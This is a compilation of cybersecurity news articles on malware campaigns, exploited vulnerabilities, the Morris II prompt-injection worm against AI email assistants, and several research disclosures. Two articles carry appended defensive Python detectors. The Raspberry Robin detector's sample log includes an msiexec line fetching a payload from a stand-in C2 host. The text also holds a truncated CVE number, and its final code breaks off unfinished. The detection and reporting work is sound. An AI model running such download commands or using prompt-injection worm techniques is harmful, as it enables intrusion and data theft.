
Researchers Successfully Sinkhole PlugX Malware Server, Recording 2.5 Million Unique IPs

 

Researchers successfully seized control of a command and control (C2) server linked to a variant of the PlugX malware, effectively halting its malicious operations. Over the span of six months, more than 2.5 million connections were logged from diverse IP addresses worldwide.

Beginning in September 2023, cybersecurity firm Sekoia took action upon identifying the unique IP address associated with the C2 server. Their efforts resulted in the logging of over 2.4 million unique IP addresses from 170 countries, allowing for comprehensive analysis of the malware's spread and the development of effective countermeasures.

Sekoia's researchers acquired the C2 server's IP address for $7. They then gained shell access to the server and set up a mimicry of the original C2 server's behavior, which allowed them to capture HTTP requests from infected hosts and gain insight into the malware's activities.

The sinkhole operation revealed a daily influx of between 90,000 to 100,000 requests from infected systems, originating from various locations worldwide. Notably, certain countries accounted for a significant portion of the infections, with Nigeria, India, China, and the United States among the most affected.

Despite the challenges posed by the malware's lack of unique identifiers and its ability to spread through various means, Sekoia's researchers identified potential strategic interests, particularly in regions associated with China's Belt and Road Initiative.

To address the widespread infection, Sekoia proposed two strategies for disinfection, urging national cybersecurity teams and law enforcement agencies to collaborate. One approach involves sending self-delete commands supported by PlugX, while the other entails the development and deployment of custom payloads to eradicate the malware from infected systems and USB drives.

While the sinkhole operation effectively neutralized the botnet controlled by PlugX, Sekoia warned of the possibility of its revival by malicious actors with access to the C2 server.

PlugX, initially linked to state-sponsored Chinese operations, has evolved into a widely used tool by various threat actors since its emergence in 2008. Its extensive capabilities and recent wormable features pose significant security risks, necessitating collaborative efforts to mitigate its impact.

Room for Error: Hotel Check-In Terminal Flaw Leads to Access Code Leak

 


Ibis Budget hotels in Germany were found to leak hotel room key codes through self-service check-in terminals, and the researcher behind the discovery says the problem could potentially affect hotels around the world. The flaw is easy to abuse: exploiting it requires no technical knowledge or specialized tools.

In practice, a persistent attacker could collect a large number of room keycodes in just a few minutes, using the same terminal that regular guests use to check into their rooms. Guests can use these self-service check-in terminals instead of speaking with front desk staff, who are not always available.

The terminals let guests not only check into their rooms but also look up information about existing bookings. According to the company's website, around 600 Ibis Budget hotels operate in 20 countries around the world. The Ibis Budget chain is owned by Accor.

The security firm Pentagrid discovered the flaw in late 2023 in a self-check-in terminal installed at an Ibis Budget hotel in Germany, and believes the vulnerability likely affected other hotels as well. Ibis Budget customers can use these kiosks to check into their rooms when no staff are present at the hotel.

After Accor was notified, Pentagrid was informed that the company had issued patches to the affected devices within a month. When a booking ID is entered, the terminal displays the associated room number as well as the keypad code used to access the room.

The guest then enters that keypad code to open the room. Pentagrid discovered that entering a series of dashes instead of a booking ID caused the terminal to display a list of current bookings. Tapping on a booking revealed the room number and the keypad access code, which remains unchanged for the duration of the guest's stay.

An attacker could therefore have used the exposed access codes to enter rooms. After the dashes were entered, the booking information shown included the cost of the booking, the room number and the valid room entry code. The researchers also found a timestamp in the data, which they assumed was the check-in date and which could indicate the length of the guest's stay.

Schobert discovered the issue by chance after attending a cybersecurity conference in Hamburg, where he used a terminal at the Altona Ibis Budget Hotel. The terminal returned 87 bookings, while the hotel has 180 rooms; it is unclear whether only 87 bookings were valid at that time or whether the bug returned fewer than the full number of bookings.

Schobert said that booking references could also be found on discarded printouts, even without the dashes trick, which is why stronger security controls were needed on the terminals. In the wrong hands, the consequences of this issue could be quite serious.

Retrieving keycodes could obviously lead to theft, and because bookings were listed with their price, an attacker could single out the wealthiest guests for the best possible rewards. Beyond theft, there is also the danger of stalking and other abuse of guests, which may put their safety at risk. The researchers note, however, that an attacker would have needed to be physically present at the targeted terminal, which would have had to be set up for self-service, most likely during the night.

Researchers Uncover Numerous Chinese Hacker Collectives Exploiting Ivanti Security Vulnerabilities

 

Several threat actors with connections to China have been identified as responsible for exploiting three security vulnerabilities affecting Ivanti appliances. These vulnerabilities are identified as CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893.

Mandiant, a cybersecurity firm, has been monitoring these clusters of threat actors, identifying them under the names UNC5221, UNC5266, UNC5291, UNC5325, UNC5330, and UNC5337. A separate Chinese hacking group, UNC3886, was previously known for exploiting zero-day bugs in Fortinet and VMware systems to infiltrate networks.

Financially motivated actors have also been observed exploiting CVE-2023-46805 and CVE-2024-21887, likely for cryptocurrency mining purposes.

"UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments," Mandiant researchers said.

Post-exploitation activities by these threat actors often involve deploying malicious tools such as the Sliver command-and-control framework, WARPWIRE credential stealer variant, and a new backdoor named TERRIBLETEA, which comes with various functionalities like command execution and keylogging.

UNC5330 has been combining CVE-2024-21893 and CVE-2024-21887 to target Ivanti Connect Secure VPN appliances, leveraging custom malware like TONERJAM and PHANTOMNET for further actions. These include reconnaissance, lateral movement, and compromising LDAP bind accounts for higher privileges.

UNC5337, another China-linked group, has been using CVE-2023-46805 and CVE-2024-218 to infiltrate Ivanti devices since January 2024, deploying a custom malware toolset known as SPAWN. This toolset includes components like SPAWNSNAIL, SPAWNMOLE, SPAWNANT, and SPAWNSLOTH, designed for stealthy and persistent backdoor access.

Mandiant assesses with medium confidence that UNC5337 and UNC5221 might be the same group, highlighting the sophistication of their tools aimed at avoiding detection.

UNC5221 has also been associated with various web shells and a Perl-based web shell called ROOTROT, which is embedded into legitimate files to evade detection. Successful deployment of these shells leads to network reconnaissance and lateral movement, potentially compromising vCenter servers with a Golang backdoor named BRICKSTORM.

Finally, UNC5291, likely associated with another group called UNC3236, has been targeting academic, energy, defense, and health sectors, focusing on Citrix Netscaler ADC initially before shifting to Ivanti Connect Secure devices.

These findings emphasize the ongoing threat posed by edge appliances, with threat actors combining zero-day vulnerabilities, open-source tools, and custom backdoors to evade detection and maintain access to networks for extended periods.

Researchers Develop AI "Worms" Capable of Inter-System Spread, Enabling Data Theft Along the Way

 

A team of researchers has developed a self-replicating computer worm designed to target AI-powered applications like Gemini Pro, ChatGPT 4.0, and LLaVA. The aim of this project was to showcase the vulnerabilities in AI-enabled systems, particularly how interconnections between generative-AI platforms can facilitate the spread of malware.

The researchers, consisting of Stav Cohen from the Israel Institute of Technology, Ben Nassi from Cornell Tech, and Ron Bitton from Intuit, dubbed their creation 'Morris II', drawing inspiration from the infamous 1988 internet worm.

Their worm was designed with three main objectives. Firstly, it was engineered to replicate itself using adversarial self-replicating prompts, which exploit the AI applications' tendency to output the original prompt, thereby perpetuating the worm. 

Secondly, it aimed to carry out various malicious activities, ranging from data theft to the creation of inflammatory emails for propagandistic purposes. Lastly, it needed the capability to traverse hosts and AI applications to proliferate within the AI ecosystem.

The worm utilizes two primary methods for propagation. The first method targets AI-assisted email applications employing retrieval-augmented generation (RAG), where a poisoned email triggers the generation of a reply containing the worm, subsequently spreading it to other hosts. The second method involves inputs to generative-AI models, prompting them to create outputs that further disseminate the worm to new hosts.

During testing, the worm successfully pilfered sensitive information such as social security numbers and credit card details.

To raise awareness about the potential risks posed by such worms, the researchers shared their findings with Google and OpenAI. While Google declined to comment, an OpenAI spokesperson acknowledged the potential exploitability of prompt-injection vulnerabilities resulting from unchecked or unfiltered user inputs.

Instances like these underscore the imperative for increased research, testing, and regulation in the deployment of generative-AI applications.

Researchers Develop 'VoltSchemer' Assaults Aimed at Wireless Charging Systems

 

A team of researchers from the University of Florida, collaborating with CertiK, a Web3 smart contract auditor, has uncovered potential security threats in wireless charging systems. Their research introduces new attack methods, named VoltSchemer, which exploit vulnerabilities in these systems by manipulating power supply voltages.

The VoltSchemer attacks, outlined in a research paper, target weaknesses in wireless charging setups, allowing attackers to disrupt charging devices, tamper with voice assistants, and override safety mechanisms outlined in the Qi standard. Notably, these attacks utilize voltage fluctuations from the power source, requiring no direct modifications to the chargers themselves.

While wireless chargers are generally considered more secure than wired alternatives due to their reliance on near-field magnetic coupling, the researchers argue that they are still susceptible to manipulation. By tampering with power signals, attackers could potentially compromise communication between the charger and the device being charged, leading to malicious actions.

The underlying issue lies in the susceptibility of wireless chargers to electromagnetic interference (EMI) caused by voltage fluctuations. This interference can modulate the power signals transmitted by the charger, enabling attackers to manipulate the magnetic field produced and issue unauthorized commands to connected devices.

In their experiments, the researchers tested the VoltSchemer attacks on nine commercially available wireless chargers, all of which were found to be vulnerable. By inserting a disguised voltage manipulation device, such as a modified power port, between the power adapter and the charger, the researchers successfully executed the attacks.

The consequences of these attacks were significant, with charging smartphones experiencing overheating and devices such as key fobs, USB drives, SSD drives, and NFC cards being permanently damaged or destroyed. The researchers emphasize that the root cause of these vulnerabilities lies in the lack of effective noise suppression in certain frequency bands within wireless charging systems.

Overall, the findings highlight the potential risks associated with wireless charging technologies and underscore the need for improved security measures, especially in high-power systems like electric vehicle (EV) wireless charging.

Researchers Claim Apple Was Aware of AirDrop User Identification and Tracking Risks Since 2019

Security researchers had reportedly alerted Apple about vulnerabilities in its AirDrop wireless sharing feature back in 2019. According to these researchers, Chinese authorities recently exploited these vulnerabilities to track users of the AirDrop function. This case has raised concerns about global privacy implications.

The Chinese government allegedly used the compromised AirDrop feature to identify users on the Beijing subway accused of sharing "inappropriate information." The exploit has prompted internet freedom advocates to urge Apple to address the issue promptly and transparently. Pro-democracy activists in Hong Kong have previously used AirDrop, leading to Chinese authorities cracking down on the feature.

Beijing-based Wangshendongjian Technology claimed to have compromised AirDrop, collecting basic identifying information such as device names, email addresses, and phone numbers. Despite Chinese officials presenting this as an effective law enforcement technique, there are calls for Apple to take swift action.

US lawmakers, including Florida Sen. Marco Rubio, have expressed concern about the security of Apple's AirDrop function, calling on the tech giant to act promptly. However, Apple has not responded to requests for comments on the matter.

Researchers from Germany's Technical University of Darmstadt, who identified the flaws in 2019, stated that Apple received their report but did not act on the findings. The researchers proposed a fix in 2021, which Apple has allegedly not implemented.

The Chinese claim has raised alarms among US lawmakers, emphasizing the need for Apple to address security issues promptly. Critics argue that Apple's inaction may be exploited by authoritarian regimes, highlighting the broader implications of tech companies' relationships with such governments.

The Chinese tech firm's exploitation of AirDrop apparently utilized techniques identified by the German researchers in 2019. Experts point out that Apple's failure to add an extra layer of security, known as "salting," allowed the unauthorized access of device-identifying information.

Security experts emphasize that while AirDrop's device-to-device communication is generally secure, users may be vulnerable if they connect with a stranger or accept unsolicited connection requests. The lack of salting in the encryption process makes it easier for unauthorized parties to decipher the exchanged data.

Following the Chinese claim, Senator Ron Wyden criticized Apple for a "blatant failure" to protect users, emphasizing the four-year delay in addressing the security hole in AirDrop. The tech firm behind the AirDrop exploit has a history of collaboration with Chinese law enforcement and security authorities.

The intentional disclosure of the exploit by Chinese officials may serve various motives, including discouraging dissidents from using AirDrop. Experts suggest that Apple may now face challenges in fixing the issue due to potential retaliation from Chinese authorities, given the company's significant presence in the Chinese market. The hack revelation could also provide China with leverage to compel Apple's cooperation with security or intelligence demands.

A Few Cybercriminals Account for All Email Extortion Attacks, New Research Reveals

 

New research conducted by Barracuda Networks, in collaboration with Columbia University, has revealed that a surprisingly small group of cybercriminals is responsible for the majority of email extortion attempts worldwide. The study examined over 300,000 flagged emails, identified as extortion attacks by the company's AI detectors, over a one-year period.

To estimate the findings, the researchers traced the bitcoin wallet addresses provided in the emails, as cybercriminals often prefer this method of payment due to the anonymity and ease of transactions in the cryptocurrency realm.

However, the number of bitcoin addresses doesn't necessarily indicate the exact number of attackers. According to Columbia Master's student Zixi (Claire) Wang, who authored the report, the actual number of attackers is likely even fewer than 100, as attackers often use multiple bitcoin addresses.

The monetary demands in these email attacks were relatively low, with approximately a quarter of the emails requesting less than $1,000 and over 90% asking for less than $2,000. Wang speculates that cybercriminals opt for smaller amounts to avoid raising suspicion with victims' banks or tax authorities, and victims are more likely to comply with lower demands without investigating the legitimacy of the threat.

The researchers also observed that Bitcoin was the sole cryptocurrency used by the attackers in their dataset. Wang suggests this is because Bitcoin offers a high level of anonymity, allowing anyone to generate numerous wallet addresses.

The common scams employed by the attackers involved claims of possessing compromising photos or videos obtained by hacking the target's device camera, with the attacker threatening to release the alleged content unless paid. However, the research revealed that the majority of attackers were bluffing: they had no such incriminating material, nor had they infected the target systems with malware.

The silver lining in this research is that the small number of perpetrators worldwide could be advantageous for law enforcement efforts. Wang believes that tracking down even a few of these attackers could significantly disrupt this cyber threat.

Furthermore, given the similarity in tactics and templates used by extortion attackers, Wang suggests that email security vendors could block a substantial portion of these attacks using relatively simple detectors. This could provide an additional layer of protection against such cyber threats.

Cyberspies Drop New Infostealer Malware on Govt Networks in Asia

 

Security researchers have discovered new cyber-espionage activity targeting Asian governments, as well as state-owned aerospace and defence companies, telecom companies, and IT organisations.
The threat group behind this activity is a distinct cluster previously associated with the "ShadowPad" RAT (remote access trojan). In recent campaigns, the threat actor used a much broader set of tools.

As per a report by Symantec's Threat Hunter team that dives into the activity, the intelligence-gathering attacks have been underway since at least early 2021 and are still ongoing. The current campaign appears to be almost entirely focused on Asian governments or public entities, such as:
  • Head of government/Prime Minister's office
  • Government institutions linked to finance
  • Government-owned aerospace and defense companies
  • State-owned telecoms companies
  • State-owned IT organizations
  • State-owned media companies
Symantec uses an example of an April 2022 attack to demonstrate how the espionage group breaches its government targets. The attack starts with the installation of a malicious DLL that is side-loaded by launching the executable of a legitimate application, which in turn loads a .dat file.

The legitimate application abused by the hackers in this case was an 11-year-old Bitdefender Crash Handler executable. The initial .dat payload contains encrypted shellcode that can be used to directly execute commands or load additional payloads from memory.

The threat actors installed ProcDump three days after gaining backdoor access to steal user credentials from the Local Security Authority Server Service (LSASS). The LadonGo penetration testing framework was side-loaded via DLL hijacking on the same day and used for network reconnaissance.

The attackers returned to the compromised machine two weeks later to install Mimikatz, a popular credential stealing tool.
Furthermore, the hackers attempted to elevate their privileges by exploiting CVE-2020-1472 (Netlogon) against two computers on the same network.

To load payloads on additional computers in the network, the attackers used PsExec to execute Crash Handler together with the DLL search-order hijacking trick. A month after the intrusion, the threat actors gained access to the Active Directory server and mounted a snapshot to access user credentials and log files.

Finally, Symantec observed the use of Fscan to attempt CVE-2021-26855 (Proxylogon) exploitation against Exchange Servers in the compromised network.

Alert! Teen Hackers are Using Discord to Disseminate Malware

 

Avast security researchers found a Discord channel where a group of teenagers is developing, updating, promoting, and selling malware and ransomware outbreaks, allegedly to make pocket money. 

The researchers assume they are all minors since they referenced their parents and instructors frequently and casually used age-specific slurs. Researchers discovered their actions via their Discord chat. The hackers sell malware variants of Snatch, Lunar, and Rift and provide a variety of services ranging from data theft to ransomware and crypto mining. 

However, researchers discovered that teen hackers mostly give easy-to-use malware builders and toolkits, allowing users to utilise them without real programming by using the "Do it yourself" (DIY) technique. 

How does the Group function? 

To become a group member or utilise the malware-as-a-service capability, interested parties must pay a charge. The registration price ranges from €5 to €25. Avast researchers observed in their analysis that about 100 accounts have already enrolled to get access to a hacking group. The malware dissemination method is a little unusual. 

The hackers posted a YouTube video displaying a bogus crack for a popular computer game or commercial software, along with a download link in the description. To establish credibility, additional users of the Discord group leave comments on the video, thanking the originator and confirming that the connection works. This method is even more twisted than bots for commenting since it becomes hard to recognise. 

How Should One Handle Teen Hackers? 

This scenario is undoubtedly troubling, and hacking ability among teenagers and minors should be channelled towards beneficial, ethical endeavours for the general benefit of the cybersecurity sector.

Parents must communicate to their children to understand the motivational elements that drive them to distribute malware. There are several tools accessible on Discord and other platforms to assist anyone interested in pursuing a career in the cybersecurity field. 

The first step, though, is for parents to interact with their children without passing judgement. It is worth emphasising that the organisation distributes unlawful malware without comprehending the gravity of the situation and dismissing it as a prank.

New Emotet Variant Capturing Users' Credit Card Data from Google Chrome

 

The infamous Emotet malware has deployed a new module aimed to steal credit card data saved in the Chrome web browser. According to corporate security firm Proofpoint, which discovered the component on June 6, the credit card stealer, which only targets Chrome, has the capacity to exfiltrate the acquired information to several remote command-and-control (C2) servers. 

The news comes amid a surge in Emotet activity since it was reactivated late last year after a 10-month pause caused by a law enforcement operation that destroyed its attack infrastructure in January 2021. Emotet, attributed to the threat actor TA542 (aka Mummy Spider or Gold Crestwood), is a sophisticated, self-propagating, and modular trojan that is distributed via email campaigns. 

According to Check Point, as of April 2022 Emotet is still the most prevalent malware, with a global impact on 6% of organisations worldwide, followed by Formbook and Agent Tesla. The malware is testing new delivery methods using OneDrive URLs and PowerShell in .LNK attachments to circumvent Microsoft's macro restrictions.

The steady increase in Emotet-related threats is further supported by the fact that the number of phishing emails, which frequently hijack existing correspondence, increased from 3,000 in February 2022 to approximately 30,000 in March, targeting organisations in various countries as part of a large-scale spam campaign. ESET stated that Emotet activity "shifted to a higher gear" in March and April 2022 and that detections increased 100-fold, indicating an 11,000 percent increase during the first four months of the year when compared to the preceding three-month period from September to December 2021. 

Japan, Italy, and Mexico have been frequent targets since the botnet's revival, according to the Slovak cybersecurity firm, with the largest wave recorded on March 16, 2022. 

Dušan Lacika, senior detection engineer at ESET, said, "The size of Emotet's latest LNK and XLL campaigns was significantly smaller than those distributed via compromised DOC files seen in March. This suggests that the operators are only using a fraction of the botnet's potential while testing new distribution vectors that could replace the now disabled-by-default VBA macros."

Researchers from CyberArk also revealed a novel approach for extracting plaintext credentials directly from memory in Chromium-based web browsers. 

"Credential data is stored in Chrome's memory in cleartext format. In addition to data that is dynamically entered when signing into specific web applications, an attacker can cause the browser to load into memory all the passwords that are stored in the password manager," CyberArk's Zeev Ben Porat said.

This includes cookie-related information such as session cookies, which an attacker might harvest and utilise to hijack users' accounts even if they are secured by multi-factor authentication.

This New Raspberry Robin Worm Utilizes Windows Installer to Drop Malware

 

A new Windows malware with worm capabilities has been identified by Red Canary intelligence investigators, and it spreads via external USB sticks. This malware is associated with the Raspberry Robin malware cluster, which was initially discovered in September 2021 (cybersecurity firm Sekoia tracks this malware as "QNAP worm").

The worm was discovered in many customers' networks by Red Canary's Detection Engineering team, including companies in the technology and manufacturing sectors. When a USB drive carrying a malicious .LNK file is attached, Raspberry Robin spreads to the new Windows system.

After the drive is attached, the worm uses cmd.exe to launch a malicious file stored on the infected drive. It then reaches out to its command-and-control (C2) servers via the Microsoft Standard Installer (msiexec.exe); these servers are most likely hosted on infected QNAP devices and use Tor exit nodes as additional C2 infrastructure.

The researchers said, "While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes." 

They believe the malware downloads a malicious DLL file on affected workstations to resist eradication between restarts, although they haven't determined how it achieves persistence. Raspberry Robin starts this DLL using two other trusted Windows utilities: fodhelper (a trusted binary for managing features in Windows settings) and odbcconf (a tool for configuring ODBC drivers).

The first permits it to get through User Account Control (UAC), while the second assists in the execution and configuration of the DLL. While Red Canary analysts have been able to extensively examine what the newly found malware performs on affected systems, some questions remain unanswered. 

The researchers stated, "First and foremost, we don't know how or where Raspberry Robin infects external drives to perpetuate its activity, though it's likely this occurs offline or otherwise outside of our visibility. We also don't know why Raspberry Robin installs a malicious DLL. One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis." 

Red Canary's report contains more technical details on the Raspberry Robin worm, including indicators of compromise (IOCs) and an ATT&CK mapping for this malware.
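The execution chain described above (cmd.exe launching a file from a removable drive, msiexec.exe reaching out to a URL, odbcconf.exe spawned by fodhelper.exe) is the kind of behaviour a detection engineer would turn into process-creation rules. The following Python is an added example and not Red Canary's code; its pipe-delimited log format, the sample events and the assumption that any drive letter other than C: is removable media are all constructed here.

```python
"""
Process-creation rules for the Raspberry Robin execution chain:
  1. cmd.exe launching something from a removable drive
  2. msiexec.exe given a remote (http/https) package
  3. odbcconf.exe spawned by fodhelper.exe (the UAC-bypass step)
Log format, sample events and the "non-C: drive == removable" assumption
are constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    parent: str    # parent image basename, lower-case
    image: str     # process image basename, lower-case
    cmdline: str


def basename(path: str) -> str:
    """Return the lower-case file name of a Windows or POSIX path."""
    return path.strip().replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Constructed format: timestamp|parent_image|image|command_line."""
    ts, parent, image, cmdline = line.split("|", 3)
    return ProcEvent(ts.strip(), basename(parent), basename(image), cmdline.strip())


URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Assumption: in this environment only C: is a fixed disk; any other
# drive letter in a command line is treated as removable media.
REMOVABLE_RE = re.compile(r"\b[D-Zd-z]:\\")


def rule_cmd_removable_drive(ev: ProcEvent) -> bool:
    return ev.image == "cmd.exe" and REMOVABLE_RE.search(ev.cmdline) is not None


def rule_msiexec_remote_package(ev: ProcEvent) -> bool:
    # Legitimate msiexec usage normally installs a local .msi; a URL on the
    # command line is the external C2 contact described in the report.
    return ev.image == "msiexec.exe" and URL_RE.search(ev.cmdline) is not None


def rule_fodhelper_odbcconf(ev: ProcEvent) -> bool:
    # fodhelper.exe has no business spawning odbcconf.exe; the pairing is
    # the UAC bypass followed by DLL loading via odbcconf.
    return ev.image == "odbcconf.exe" and ev.parent == "fodhelper.exe"


RULES = {
    "cmd_removable_drive": rule_cmd_removable_drive,
    "msiexec_remote_package": rule_msiexec_remote_package,
    "fodhelper_odbcconf": rule_fodhelper_odbcconf,
}


def detect(lines):
    """Return (rule_name, timestamp, image) for every event a rule matches."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        for name, rule in RULES.items():
            if rule(ev):
                findings.append((name, ev.ts, ev.image))
    return findings


# Constructed sample events: two benign, three matching the chain above.
SAMPLE_LOG = r"""
2022-05-02T09:13:50Z|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd /c dir C:\temp
2022-05-02T09:14:03Z|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd /R start E:\recovery.bat
2022-05-02T09:14:10Z|C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|msiexec /i C:\Users\alice\Downloads\tool.msi
2022-05-02T09:14:21Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\msiexec.exe|msiexec /q /i http://c2.example.invalid:8080/update.msi
2022-05-02T09:15:02Z|C:\Windows\System32\fodhelper.exe|C:\Windows\System32\odbcconf.exe|odbcconf -f C:\Users\Public\config.rsp
"""


if __name__ == "__main__":
    for name, ts, image in detect(SAMPLE_LOG.splitlines()):
        print(f"{ts} {image:<14} {name}")
```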

Google Researchers: 'Zero-Day’ Hacks Hit Record in 2021

 

Following a year marked by high-profile ransomware assaults and supply-chain hacks, Google researchers have uncovered another alarming cyber milepost for 2021: a record number of "zero-day" exploits. A zero-day exploit is a previously undisclosed flaw that gives software developers exactly 0 days to fix it. As a result, the technology in question is extremely lucrative to hackers - and a disaster for cyber-security experts. 

According to a report released Tuesday (April 19) by Google's Project Zero, a team of specialist bug hunters, hackers attacked a total of 58 zero-day defects affecting key software suppliers in 2021. In 2020, there were 25 flaws, compared to 21 in 2019. Since Project Zero began tracking zero-days in 2014, this is the largest number of zero-days ever recorded. 

Ms Maddie Stone, a security researcher at Project Zero, stated in a blog post about the findings that the trend could be attributed to an enhancement in identification from companies like Microsoft, Apple, and Google, who now publicly report their findings around zero-day concerns, rather than a spike in hacks. 

Attackers have used zero-day exploits in recent years to install powerful spyware on smartphones, which has then been used to surveil journalists, lawmakers, human rights activists and others. Last year, suspected Chinese state-sponsored hackers used such vulnerabilities to compromise Microsoft Exchange servers. 

Stone said the data also held some surprises. Despite the recent attention on spyware abuse, very few of the zero-days detected in the wild targeted messaging applications, even though those apps are obvious targets. 

She wrote, "We know that messaging applications like WhatsApp, Signal, Telegram, etc are targets of interest to attackers and yet there's only one messaging app, in this case, iMessage, zero-day found this past year." 

Since 2014 the team has recorded only two such in-the-wild messaging-app zero-days: one in WhatsApp in 2019 and one in iMessage in 2021. According to Stone, the majority of people are not at risk of being targeted by a zero-day attack. 

Nonetheless, she believes that such attacks have a widespread influence. "These zero-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful."

Researchers Disclosed Details of NSA Equation Group’s Bvp47 Backdoor

 

Pangu Lab researchers have published details of a top-tier Linux APT backdoor, dubbed Bvp47, which they attribute to the Equation Group, a threat actor linked to the US National Security Agency (NSA). 

The name "Bvp47" comes from repeated references to the string "Bvp" and the numeric constant 0x47 used in its encryption routine. The backdoor was first found in 2013 during a forensic investigation of an intrusion at a Chinese government entity; according to the researchers, it was discovered on Linux hosts during an in-depth examination of a machine in a key domestic department. The code clearly belonged to a top-tier APT backdoor, but further analysis was blocked because activating its remote-control function requires the attacker's private key for its asymmetric encryption scheme.

The hacking group The Shadow Brokers leaked a trove of data reportedly stolen from the Equation Group in 2016 and 2017, including a range of hacking tools and exploits. At the end of October 2016 the group released a further dump, this time containing a list of systems compromised by the NSA-linked Equation Group. Pangu Lab identified the Bvp47 backdoor within the material exposed by The Shadow Brokers. According to the leaked data, the Equation Group hit over 287 targets in 45 countries over ten years, including Russia, Japan, Spain, Germany and Italy. 

Governments, telecommunications, aerospace, energy, financial institutions, nuclear research, oil and gas, military, transportation and companies researching encryption technologies were among the sectors the group targeted. Pangu Lab has named the attacks involving the Bvp47 backdoor "Operation Telescreen". The malicious code was built to give its operators long-term control over compromised devices. 

The report published by the experts stated, “The implementation of Bvp47 includes complex code, segment encryption and decryption, Linux multi-version platform adaptation, rich rootkit anti-tracking techniques, and most importantly, it integrates advanced BPF engine used in advanced covert channels, as well as cumbersome communication encryption and decryption process”  

The experts say the backdoor's network attack capability, which is backed by zero-day exploits, was effectively impossible to defend against at the time. The Pangu Lab report covers the technical details of the backdoor as well as the evidence tying the Equation Group to the US National Security Agency. The attribution rests on exploits found in the encrypted archive "eqgrp-auction-file.tar.xz.gpg" that The Shadow Brokers released after their failed 2016 auction.

By Attacking Healthcare, Education, and Government Systems, FritzFrog Botnet Grew Tenfold

 

The FritzFrog botnet, active for over two years, has resurfaced with an alarming infection rate, growing tenfold in a single month by attacking healthcare, education and government networks through exposed SSH servers. FritzFrog, a Golang malware first documented in August 2020, is both a worm and a botnet and has targeted the government, education and finance sectors. 

The malware assembles and executes its payload entirely in memory, so nothing is written to disk. Thanks to its custom peer-to-peer (P2P) implementation there is no central command-and-control (C&C) server issuing commands; the botnet is self-sufficient and decentralised. Despite its aggressive brute-force tactics against SSH servers, it is surprisingly efficient at spreading its targets evenly across a network. 

Guardicore Labs has been monitoring FritzFrog with its honeypot network for some time. "We started monitoring the campaign’s activity, which rose steadily and significantly with time, reaching an overall of 13k attacks on Guardicore Global Sensors Network (GGSN). Since its first appearance, we identified 20 different versions of the Fritzfrog binary," said the company in a report published in August 2020, authored by security researcher Ophir Harpaz.

Researchers at internet security firm Akamai have discovered a new version of the FritzFrog malware with intriguing new features, including the use of a Tor proxy chain. The new variant also shows signs that its operators plan to extend it to target WordPress servers. 

Although Akamai's global sensor network recorded 24,000 attacks, the botnet has claimed only 1,500 victims so far. Most infected hosts are in China, but affected systems also include a European TV network, a Russian healthcare organisation and several East Asian universities. The operators have added a filter list to skip low-powered devices such as Raspberry Pi boards, and the malware contains code that lays the groundwork for targeting WordPress sites. 

Given that the botnet is known for cryptocurrency mining, this is an odd addition; Akamai believes the operators may be exploring new means of monetisation, such as deploying ransomware or leaking data. The functionality is currently dormant while it is being developed. The researchers note that FritzFrog is under constant development, with bugs being fixed daily. 

FritzFrog targets any device that exposes an SSH server, so administrators of data-centre servers, cloud instances and routers must be careful, the researchers warn. Akamai's recommendations include enabling system login auditing with alerting, monitoring the authorized_keys files on Linux hosts for keys that were not deliberately added, and configuring an explicit allow list for SSH logins, among others.
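The two detections Akamai recommends above, login auditing and authorized_keys monitoring, are easy to prototype. The following is an added example written for this page, not Akamai's or Guardicore's code: it flags source addresses that fail SSH logins repeatedly and then succeed (the footprint a brute-forcing worm leaves), and lists authorized_keys entries that are not on an operator allow list. The sshd log lines, key blobs and threshold are constructed for the example.

```python
"""Added example (not Akamai's or Guardicore's code): SSH brute-force detection
over sshd log lines plus an authorized_keys allow-list check."""
import re
import shlex
from collections import Counter, defaultdict

# Constructed sample of sshd log lines (not real victim data): one source
# hammers root/admin/oracle and finally gets in; another is a legitimate user.
SAMPLE_AUTH_LOG = """\
Jan 12 03:14:01 web1 sshd[2001]: Failed password for root from 198.51.100.7 port 52110 ssh2
Jan 12 03:14:02 web1 sshd[2002]: Failed password for root from 198.51.100.7 port 52112 ssh2
Jan 12 03:14:02 web1 sshd[2003]: Failed password for invalid user admin from 198.51.100.7 port 52114 ssh2
Jan 12 03:14:03 web1 sshd[2004]: Failed password for oracle from 198.51.100.7 port 52116 ssh2
Jan 12 03:14:05 web1 sshd[2005]: Failed password for root from 198.51.100.7 port 52118 ssh2
Jan 12 03:14:06 web1 sshd[2006]: Accepted password for root from 198.51.100.7 port 52120 ssh2
Jan 12 03:20:11 web1 sshd[2100]: Failed password for alice from 203.0.113.9 port 40010 ssh2
Jan 12 03:20:15 web1 sshd[2101]: Accepted publickey for alice from 203.0.113.9 port 40011 ssh2
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port")


def find_bruteforce(log_text, threshold=5):
    """Return {ip: {"failures": n, "users": [...], "succeeded_after": bool}}
    for every source with at least `threshold` failed logins. A success that
    follows a burst of failures from the same IP is the strongest signal."""
    failures = Counter()
    users = defaultdict(set)
    succeeded = set()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            users[ip].add(user)
            continue
        m = ACCEPTED_RE.search(line)
        if m and failures[m.group(3)] > 0:      # success after earlier failures
            succeeded.add(m.group(3))
    return {
        ip: {"failures": n, "users": sorted(users[ip]), "succeeded_after": ip in succeeded}
        for ip, n in failures.items() if n >= threshold
    }


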